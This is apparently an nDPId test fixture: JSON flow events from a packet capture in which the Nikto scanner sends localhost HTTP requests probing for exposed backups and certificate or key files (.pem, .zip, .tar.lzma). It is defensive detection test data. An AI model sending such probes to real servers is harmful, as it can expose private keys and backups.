+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1576420277128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277128,"pkt":"AAAAAAAAAAAAAAAACABFAADBZB5AAEAG2BZ\/AAABfwAAAcPMH5CtKVyfkMJlVIAYAED+tQAAAQEICp1m\/LCdZvywR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1576420277130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277130,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JsdAAEAGFXJ\/AAABfwAAAcPOH5Ap0h5I7vzLNIAYAED+sQAAAQEICp1m\/LKdZvyyR0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1576420277134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277134,"pkt":"AAAAAAAAAAAAAAAACABFAAC9UWBAAEAG6th\/AAABfwAAAcPQH5CgyWnegf\/5dIAYAED+sQAAAQEICp1m\/LWdZvy1R0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1576420277136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277136,"pkt":"AAAAAAAAAAAAAAAACABFAADFelpAAEAGwdZ\/AAABfwAAAcPSH5CODELdlJWwD4AYAED+uQAAAQEICp1m\/LedZvy3R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1576420277141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277141,"pkt":"AAAAAAAAAAAAAAAACABFAADF+nFAAEAGQb9\/AAABfwAAAcPUH5Dn1sLrZe4ChoAYAED+uQAAAQEICp1m\/L2dZvy9R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1576420277142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277142,"pkt":"AAAAAAAAAAAAAAAACABFAADHb5RAAEAGzJp\/AAABfwAAAcPWH5B0BVcY3NxdJYAYAED+uwAAAQEICp1m\/L6dZvy+R0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1576420277144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277144,"pkt":"AAAAAAAAAAAAAAAACABFAADHO5VAAEAGAJp\/AAABfwAAAcPYH5AuGgMWrL1WfYAYAED+uwAAAQEICp1m\/MCdZvzAR0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1576420277145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277145,"pkt":"AAAAAAAAAAAAAAAACABFAADD1QZAAEAGZyx\/AAABfwAAAcPaH5AWHu2DG+Oig4AYAED+twAAAQEICp1m\/MGdZvzBR0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1576420277148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277148,"pkt":"AAAAAAAAAAAAAAAACABFAADDYFdAAEAG29t\/AAABfwAAAcPcH5BE+VjTl6\/NvYAYAED+twAAAQEICp1m\/MSdZvzER0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1576420277153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277153,"pkt":"AAAAAAAAAAAAAAAACABFAADCOn5AAEAGAbZ\/AAABfwAAAcPeH5C7hwL1asNzroAYAED+tgAAAQEICp1m\/MmdZvzJR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1576420277155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277155,"pkt":"AAAAAAAAAAAAAAAACABFAADCDytAAEAGLQl\/AAABfwAAAcPgH5C7IzeiGEGCK4AYAED+tgAAAQEICp1m\/MudZvzLR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 